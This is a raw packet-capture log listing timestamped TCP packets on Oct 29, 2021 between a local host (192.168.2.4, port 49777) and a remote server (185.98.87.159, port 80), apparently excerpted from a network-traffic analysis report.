Oct 29, 2021 20:49:51.097547054 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097563982 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097579002 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.097583055 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.097606897 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.097625971 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149182081 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149204969 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149221897 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149239063 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149256945 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149272919 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149286032 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149291039 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149308920 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149321079 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149326086 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149347067 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149380922 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149399042 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149418116 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149420023 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149436951 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149455070 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149456978 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149472952 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149488926 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149492025 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149507046 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149523973 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149528027 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149545908 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149561882 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.149569988 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.149602890 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201018095 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201041937 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201059103 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201076031 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201092005 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201107979 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201126099 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201127052 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201143980 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201157093 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201163054 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201167107 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201184988 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201193094 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201205015 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201221943 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201226950 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201265097 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201280117 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201297045 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201342106 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201396942 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201416016 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201438904 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201455116 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201467037 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201502085 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201503038 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201519966 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201536894 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201554060 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201569080 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201576948 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201596975 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201603889 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201617956 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201637983 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201646090 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201657057 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201685905 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201692104 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201723099 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201741934 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201745033 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201766014 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201782942 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201790094 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201816082 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201845884 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201863050 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201864004 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201880932 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201896906 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201914072 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201942921 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.201948881 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201967001 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.201981068 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.202047110 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.252922058 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.252962112 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.252985001 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253006935 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253032923 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253053904 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253074884 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253098011 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253122091 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253144026 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253145933 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253168106 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253184080 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253189087 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253207922 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253216028 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253225088 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253247976 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253252029 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253271103 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253272057 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253292084 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253309011 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253315926 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253325939 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253343105 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253359079 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253360033 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253386974 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253390074 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253468990 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253693104 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253725052 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253747940 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253770113 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253789902 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253796101 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253824949 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253844976 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253846884 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253870010 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253895998 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253925085 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.253952026 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253977060 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.253998995 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254020929 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.254023075 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254080057 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.254198074 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254254103 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254271030 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254287958 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254297972 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.254334927 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.254456997 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254482031 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254504919 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254528046 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254550934 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254574060 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254582882 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.254599094 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254621029 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.254623890 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254647017 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254671097 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.254679918 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.254724979 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305494070 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305545092 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305572033 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305597067 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305598974 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305622101 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305644035 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305649042 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305675030 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305697918 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305700064 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305727959 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305740118 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305752993 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305779934 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305804014 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305821896 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305829048 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305849075 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305855989 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305880070 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305902958 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305903912 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305926085 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305947065 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305948019 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.305969954 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305991888 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.305994987 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306015968 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306036949 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306040049 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306085110 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306113005 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306134939 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306154013 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306173086 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306179047 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306190968 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306209087 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306221008 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306226969 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306242943 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306250095 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306260109 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306277037 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306293011 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306322098 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306426048 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306442976 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306458950 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306474924 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306514025 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306634903 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306652069 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306669950 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306684971 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306703091 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306708097 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306720018 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306737900 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306746960 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306756973 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306773901 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306776047 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306791067 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306807041 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306807995 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306828976 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.306837082 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.306876898 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.357724905 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.357759953 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.357808113 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.357912064 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.357933998 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.357954979 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358021975 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358068943 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358076096 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358097076 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358108044 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358118057 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358182907 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358203888 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358223915 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358243942 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358247042 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358315945 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358351946 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358371019 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358376980 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358452082 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358473063 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358475924 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358498096 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358496904 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358562946 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358603954 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358625889 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358638048 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358647108 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358669996 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358680010 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358691931 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358696938 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358714104 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358736038 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358740091 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358757019 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358777046 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358795881 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358803988 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358817101 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358834982 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358836889 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358858109 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358866930 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358880043 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358903885 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358912945 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358925104 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358946085 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.358952045 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.358990908 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.359003067 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359028101 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359050989 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359074116 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359076023 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.359097004 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359117031 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.359121084 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359144926 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359165907 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359172106 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.359194040 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359208107 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.359219074 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359242916 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359266043 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.359275103 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.359302044 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.409477949 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.409514904 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.409621000 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.410550117 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.410577059 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.410665035 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.410783052 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.410808086 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.410846949 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.410856962 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.410878897 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.410923958 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.411180019 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411202908 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411225080 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411247015 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411266088 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.411267996 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411289930 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411294937 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.411329031 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411339045 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.411353111 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411398888 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.411809921 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411832094 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411865950 CEST	80	49777	185.98.87.159	192.168.2.4
